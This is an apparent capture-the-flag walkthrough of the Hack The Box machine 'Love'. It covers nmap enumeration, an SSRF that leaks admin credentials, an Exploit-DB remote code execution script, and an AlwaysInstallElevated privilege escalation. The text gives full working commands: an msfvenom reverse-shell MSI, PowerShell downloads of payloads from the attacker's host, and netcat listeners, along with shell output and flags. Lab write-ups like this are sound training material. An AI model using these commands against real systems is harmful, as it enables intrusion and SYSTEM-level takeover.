Love

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports quickly and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.239 -oN allPorts

• -sSTCP SYN

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Mon Jan 10 17:31:43 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.239
Host is up (0.062s latency).
Not shown: 59778 closed tcp ports (reset), 5738 filtered tcp ports (no-response)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5000/tcp  open  upnp
5040/tcp  open  unknown
5985/tcp  open  wsman
5986/tcp  open  wsmans
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

# Nmap done at Mon Jan 10 17:32:10 2022 -- 1 IP address (1 host up) scanned in 27.61 seconds

As we see there are quite a lot of ports open.

Let's try to obtain the services and versions of these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665 10.10.10.239 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Mon Jan 10 17:35:33 2022 as: nmap -sCV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665 -oN targeted 10.10.10.239
Nmap scan report for 10.10.10.239                                                                              
Host is up (0.065s latency).                                                                                   
                                                                                                               
PORT      STATE SERVICE      VERSION                                                                           
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)                            
|_http-title: Voting System using PHP                                                                          
| http-cookie-flags:                                                                                                                                                                                                           
|   /:                                                                                                         
|     PHPSESSID:                                                                                               
|_      httponly flag not set                                                                                  
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27                                          
135/tcp   open  msrpc        Microsoft Windows RPC                                                             
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn                                                                                                                                                                     
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn:                                                                                                    
|_  http/1.1                                                                                                   
|_http-title: 403 Forbidden                                                                                    
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16                                                                        
|_Not valid after:  2022-01-18T14:00:16                                                                        
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27                                          
|_ssl-date: TLS randomness does not represent time                                                             
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)                           
3306/tcp  open  mysql?                                                                                         
| fingerprint-strings:                                                                                         
|   FourOhFourRequest, SSLSessionReq:                                                                          
|_    Host '10.10.14.18' is not allowed to connect to this MariaDB server                                      
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)                                   
|_http-title: 403 Forbidden                                                                                    
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27                                          
5040/tcp  open  unknown                                                                                        
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)                                           
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                    
|_http-title: Not Found                                                                                        
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: 2022-01-10T17:00:06+00:00; +21m35s from scanner time.                                                                                                                                                              
|_http-server-header: Microsoft-HTTPAPI/2.0                                                                                                                                                                                    
|_http-title: Not Found                                                            
| tls-alpn:                                                                                                                                                                                                                    
|_  http/1.1                                                                       
| ssl-cert: Subject: commonName=LOVE                                               
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19                                            
|_Not valid after:  2024-04-10T14:39:19                                            
7680/tcp  open  pando-pub?                                                         
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found                                                            
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :                                                                                                                                                                   
SF-Port3306-TCP:V=7.92%I=7%D=1/10%Time=61DC6065%P=x86_64-pc-linux-gnu%r(SS
SF:LSessionReq,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Fou
SF:rOhFourRequest,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.18'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:                                                               
|_clock-skew: mean: 2h21m35s, deviation: 4h00m01s, median: 21m34s
| smb2-security-mode:                                                              
|   3.1.1:                                                                         
|_    Message signing enabled but not required
| smb-security-mode:                                                               
|   account_used: guest                                                            
|   authentication_level: user                                                     
|   challenge_response: supported                                                  
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:                                                                
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love                                                            
|   NetBIOS computer name: LOVE\x00                                                
|   Workgroup: WORKGROUP\x00                                                       
|_  System time: 2022-01-10T08:59:52-08:00
| smb2-time:                                                                       
|   date: 2022-01-10T16:59:54                                                      
|_  start_date: N/A                                                                

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 17:38:32 2022 -- 1 IP address (1 host up) scanned in 178.95 seconds

There is quite a lot of information. Let's start with the basics. In the first place, I see there is an HTTPS service running on port 443. Let's inspect the SSL certificate with the following command:

openssl s_client -connect 10.10.10.239:443

• s_client implements a generic SSL/TLS client.

• -connect tests connectivity to an HTTPS service..

At some point we should see this:

Certificate chain                                          
 0 s:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb                                                                                                                       
   i:C = in, ST = m, L = norway, O = ValentineCorp, OU = love.htb, CN = staging.love.htb, emailAddress = roy@love.htb             

Now we know that the common name (CN) is staging.love.htb and the Organization Unit (OU) is love.htb. Let's add both to the /etc/hosts file and see if there is Virtual Hosting.

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.239    staging.love.htb    love.htb

Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server.

Let's see what appears with each domain name. If we open our browser, and search for http://10.10.10.239, we will see a login page that require an ID and a password.

If we search for http://staging.love.htb, we should see a Free File Scanner website.

Exploitation

All the other domain names will show us a 403 Forbidden message, so let's inspect this page a bit further. If we click on Demo, we should see something interesting. The webpage allow us to see the content of an especific URL.

Let's try something, if you look carefully at the nmap scan, you could see there is another HTTP service running on port 5000, but if try to see it's content on the browser we get the 403 Forbidden message.

But maybe we could see it's content with the utility we found on the Demo page. All we have to do is specify the http://localhost:5000 URL.

And we got some credentials! This attack is called Server Side Request Forgery (SSRF).

Server Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure.

So now we have credentials, but for what? On http://10.10.10.239 there was a login page, but it was asking for an ID and a password, and we have a user and password. So that's not going to work. Let's try to list directories with gobuster.

gobuster dir -u http://10.10.10.239 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

• dir enumerates directories or files.

• -u the target URL.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.239
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/19 22:31:33 Starting gobuster in directory enumeration mode
===============================================================
/Images               (Status: 301) [Size: 338] [--> http://10.10.10.239/Images/]
/images               (Status: 301) [Size: 338] [--> http://10.10.10.239/images/]
/admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/admin/] 
/plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/plugins/]
/includes             (Status: 301) [Size: 340] [--> http://10.10.10.239/includes/]
/dist                 (Status: 301) [Size: 336] [--> http://10.10.10.239/dist/]    
/licenses             (Status: 403) [Size: 421]                                    
/examples             (Status: 503) [Size: 402]                                    
/IMAGES               (Status: 301) [Size: 338] [--> http://10.10.10.239/IMAGES/]  
/%20                  (Status: 403) [Size: 302]                                    
/Admin                (Status: 301) [Size: 337] [--> http://10.10.10.239/Admin/]   
/*checkout*           (Status: 403) [Size: 302]                                    
/Plugins              (Status: 301) [Size: 339] [--> http://10.10.10.239/Plugins/] 
/phpmyadmin           (Status: 403) [Size: 302]                                    
/webalizer            (Status: 403) [Size: 302]                                    
                                                                                   
===============================================================
2022/01/19 22:38:28 Finished
===============================================================

Gobuster found an /Admin directory, let's take a look at it.

This login page is a bit different, becouse it is asking for a username and a password. Let's try the credentials we found earlier.

And we got in! At this point I tried to look for common exploits on exploit-db.

Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.

https://www.exploit-db.com/

And I found a Authenticated Remote Code Execution script coded in python. Before running it, we have to change the website address, the username, the password, out local IP address and a port i which we will be listening on.

# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.12" # Reverse shell IP
REV_PORT = "8888" # Reverse port 
# --------------------------------

Let's set a netcat listener on port 8888.

nc -lvnp 8888

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

And if we run the exploit, we should get a shell as the user phoebe and we could grab the user flag.

python3 exploit.py

listening on [any] 8888 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60626
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\xampp\htdocs\omrs\images>type c:\users\phoebe\desktop\user.txt
type c:\users\phoebe\desktop\user.txt
b195b1d1c75beff2ccb8c1b4d46bdb74

Privilege Escalation

Time to become the NT AUTHORITY\SYSTEM user. If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tell us.

WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. You can download it from the official Github page:

https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

Let's set a SimpleHTTPServer with python on our current directory.

python -m SimpleHTTPServer

Now on the victim machine let's run the following command in order to download the winPEAS binary from our machine.

powershell -c "wget http://10.10.14.12:8000/winPEASx64.exe -outfile winPEASx64.exe"

If we run the binary a lot of text appear. But at some point we should see the following information:

͹ Checking AlwaysInstallElevated
  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

It looks like AlwaysInstallElevated is set to 1 in both HKLM and HKCU registries. If you do your research on how to escalate privileges with the AlwaysInstallElevated set to 1 in both registries, you will notice that we can run Microsoft Windows Installer Package (MSI) with system privileges.

The following link explains how to exploit this vulnerability: https://dmcxblue.gitbook.io/red-team-notes/privesc/unquoted-service-path.

As we can run MSI files with elevated privileges, the idea is to create a malicious MSI file that sends our machine a reverse shell as the NT AUTHORITY\SYSTEM user. Let's create this malicious file from our machine with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.12 lport=4444 -f msi -o reverse.msi

• -p indicates the type of payload.

• lhost local host IP.

• lport local port of the listener.

• -f output format.

• -o save the output to a file.

To transfer the malicious MSI file to the victim machine we do the same process as before.

python -m SimpleHTTPServer

Now on the victim machine let's run the following command in order to download the MSI file from our machine.

powershell -c "wget http://10.10.14.12:8000/reverse.msi -outfile reverse.msi

Before running the MSI file, let's set another netcat listener on port 4444.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

To run the malicious MSI file we have to execute the following command:

msiexec /i reverse.msi

And we get the shell as the NT AUTHORITY\SYSTEM user. Finally, all we have to do is reap the harvest and take the root flag.

listening on [any] 4444 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.239] 60637
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>type c:\users\administrator\desktop\root.txt
type c:\users\administrator\desktop\root.txt
b386de5a9e7f3c5aa500dff096f96ba8